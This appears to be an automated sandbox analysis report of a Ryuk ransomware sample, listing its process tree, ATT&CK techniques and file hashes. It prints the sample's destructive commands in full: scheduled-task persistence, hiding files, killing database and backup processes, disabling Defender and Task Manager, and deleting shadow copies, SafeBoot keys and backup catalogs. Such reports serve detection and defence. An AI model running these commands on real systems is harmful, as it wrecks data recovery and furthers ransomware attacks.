PID 1468 wrote to memory of 1376	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1064	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1064	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1064	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 296	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 296	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 296	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 296 wrote to memory of 592	296	cmd.exe	schtasks.exe
PID 296 wrote to memory of 592	296	cmd.exe	schtasks.exe
PID 296 wrote to memory of 592	296	cmd.exe	schtasks.exe
PID 1468 wrote to memory of 1936	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1936	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1936	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1936 wrote to memory of 1368	1936	cmd.exe	attrib.exe
PID 1936 wrote to memory of 1368	1936	cmd.exe	attrib.exe
PID 1936 wrote to memory of 1368	1936	cmd.exe	attrib.exe
PID 1468 wrote to memory of 464	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 464	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 464	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 464 wrote to memory of 1136	464	cmd.exe	schtasks.exe
PID 464 wrote to memory of 1136	464	cmd.exe	schtasks.exe
PID 464 wrote to memory of 1136	464	cmd.exe	schtasks.exe
PID 1468 wrote to memory of 1780	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1780	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1780	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1780 wrote to memory of 288	1780	cmd.exe	schtasks.exe
PID 1780 wrote to memory of 288	1780	cmd.exe	schtasks.exe
PID 1780 wrote to memory of 288	1780	cmd.exe	schtasks.exe
PID 1468 wrote to memory of 1924	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1924	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1924	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1924 wrote to memory of 832	1924	cmd.exe	attrib.exe
PID 1924 wrote to memory of 832	1924	cmd.exe	attrib.exe
PID 1924 wrote to memory of 832	1924	cmd.exe	attrib.exe
PID 1468 wrote to memory of 1672	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1672	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1672	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1672 wrote to memory of 1556	1672	cmd.exe	attrib.exe
PID 1672 wrote to memory of 1556	1672	cmd.exe	attrib.exe
PID 1672 wrote to memory of 1556	1672	cmd.exe	attrib.exe
PID 1468 wrote to memory of 1840	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1840	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1840	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1840 wrote to memory of 616	1840	cmd.exe	cmd.exe
PID 1840 wrote to memory of 616	1840	cmd.exe	cmd.exe
PID 1840 wrote to memory of 616	1840	cmd.exe	cmd.exe
PID 1468 wrote to memory of 1100	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1100	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1100	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1392	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1392	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1468 wrote to memory of 1392	1468	8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe	cmd.exe
PID 1100 wrote to memory of 984	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 984	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 984	1100	cmd.exe	reg.exe
PID 1392 wrote to memory of 844	1392	cmd.exe	cmd.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1368 attrib.exe
832 attrib.exe
1556 attrib.exe

pid	process
1368	attrib.exe
832	attrib.exe
1556	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:1376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:1064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:464

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F
3⤵
- Creates scheduled task(s)
PID:288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
PID:616

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:844

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:1760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:1608

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:1496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1776

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1064

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:540

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:1968

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:696

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:592

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:1404

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:288

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:840

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:1620

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:1612

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:1680

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:1760

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:1112

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:1512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:1164

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1888

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Modifies boot configuration data using bcdedit
PID:988

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID
Filesize
8B

MD5
85a6d10468885323e5dc2549da732a02

SHA1
60b074142818f87396012ba26b18cf17108210f8

SHA256
07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a

SHA512
4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
23cb6bce418d720b600fb36625cea4df

SHA1
8f4018131e41187445688df8cbda01119efff157

SHA256
4ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136

SHA512
18bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
4525d98c2b8f6b5d5acfc9857a6ee0a0

SHA1
e1c4a28a58a0399adaf155e9d064d986160645dd

SHA256
58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63

SHA512
5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
4525d98c2b8f6b5d5acfc9857a6ee0a0

SHA1
e1c4a28a58a0399adaf155e9d064d986160645dd

SHA256
58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63

SHA512
5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
15c189b77237ef2f94a84437c8cfc21c

SHA1
56220c87147712076222f778b1e5e5088db0865d

SHA256
e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd

SHA512
7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
15c189b77237ef2f94a84437c8cfc21c

SHA1
56220c87147712076222f778b1e5e5088db0865d

SHA256
e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd

SHA512
7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
a57e1e6fe1c98d2e75799a46e9eb5797

SHA1
7878e7042c355546c118a38b90d8f7221f74d8a4

SHA256
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

SHA512
5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
85a6d10468885323e5dc2549da732a02

SHA1
60b074142818f87396012ba26b18cf17108210f8

SHA256
07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a

SHA512
4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
4525d98c2b8f6b5d5acfc9857a6ee0a0

SHA1
e1c4a28a58a0399adaf155e9d064d986160645dd

SHA256
58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63

SHA512
5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
15c189b77237ef2f94a84437c8cfc21c

SHA1
56220c87147712076222f778b1e5e5088db0865d

SHA256
e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd

SHA512
7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
a57e1e6fe1c98d2e75799a46e9eb5797

SHA1
7878e7042c355546c118a38b90d8f7221f74d8a4

SHA256
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

SHA512
5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

Download Submit
memory/288-110-0x0000000000000000-mapping.dmp

Download
memory/288-67-0x0000000000000000-mapping.dmp

Download
memory/296-59-0x0000000000000000-mapping.dmp

Download
memory/332-100-0x0000000000000000-mapping.dmp

Download
memory/464-64-0x0000000000000000-mapping.dmp

Download
memory/524-117-0x0000000000000000-mapping.dmp

Download
memory/540-101-0x0000000000000000-mapping.dmp

Download
memory/592-107-0x0000000000000000-mapping.dmp

Download
memory/592-60-0x0000000000000000-mapping.dmp

Download
memory/616-73-0x0000000000000000-mapping.dmp

Download
memory/696-106-0x0000000000000000-mapping.dmp

Download
memory/772-122-0x0000000000000000-mapping.dmp

Download
memory/832-69-0x0000000000000000-mapping.dmp

Download
memory/840-112-0x0000000000000000-mapping.dmp

Download
memory/844-105-0x0000000000000000-mapping.dmp

Download
memory/844-77-0x0000000000000000-mapping.dmp

Download
memory/984-76-0x0000000000000000-mapping.dmp

Download
memory/988-123-0x0000000000000000-mapping.dmp

Download
memory/1012-87-0x0000000000000000-mapping.dmp

Download
memory/1064-99-0x0000000000000000-mapping.dmp

Download
memory/1064-58-0x0000000000000000-mapping.dmp

Download
memory/1096-79-0x0000000000000000-mapping.dmp

Download
memory/1100-74-0x0000000000000000-mapping.dmp

Download
memory/1112-121-0x0000000000000000-mapping.dmp

Download
memory/1136-65-0x0000000000000000-mapping.dmp

Download
memory/1164-124-0x0000000000000000-mapping.dmp

Download
memory/1368-62-0x0000000000000000-mapping.dmp

Download
memory/1376-56-0x0000000000000000-mapping.dmp

Download
memory/1376-98-0x0000000000000000-mapping.dmp

Download
memory/1392-75-0x0000000000000000-mapping.dmp

Download
memory/1404-108-0x0000000000000000-mapping.dmp

Download
memory/1416-54-0x0000000000000000-mapping.dmp

Download
memory/1420-119-0x0000000000000000-mapping.dmp

Download
memory/1468-103-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmp

Filesize
8KB

Download
memory/1496-96-0x0000000000000000-mapping.dmp

Download
memory/1516-91-0x0000000000000000-mapping.dmp

Download
memory/1556-71-0x0000000000000000-mapping.dmp

Download
memory/1608-95-0x0000000000000000-mapping.dmp

Download
memory/1612-114-0x0000000000000000-mapping.dmp

Download
memory/1620-113-0x0000000000000000-mapping.dmp

Download
memory/1672-70-0x0000000000000000-mapping.dmp

Download
memory/1680-118-0x0000000000000000-mapping.dmp

Download
memory/1700-102-0x0000000000000000-mapping.dmp

Download
memory/1708-116-0x0000000000000000-mapping.dmp

Download
memory/1728-125-0x0000000000000000-mapping.dmp

Download
memory/1736-93-0x0000000000000000-mapping.dmp

Download
memory/1760-120-0x0000000000000000-mapping.dmp

Download
memory/1760-83-0x0000000000000000-mapping.dmp

Download
memory/1776-97-0x0000000000000000-mapping.dmp

Download
memory/1776-55-0x0000000000000000-mapping.dmp

Download
memory/1780-66-0x0000000000000000-mapping.dmp

Download
memory/1840-72-0x0000000000000000-mapping.dmp

Download
memory/1924-68-0x0000000000000000-mapping.dmp

Download
memory/1936-61-0x0000000000000000-mapping.dmp

Download
memory/1944-115-0x0000000000000000-mapping.dmp

Download
memory/1968-84-0x0000000000000000-mapping.dmp

Download
memory/1968-104-0x0000000000000000-mapping.dmp

Download
memory/2004-78-0x0000000000000000-mapping.dmp

Download
memory/2040-80-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads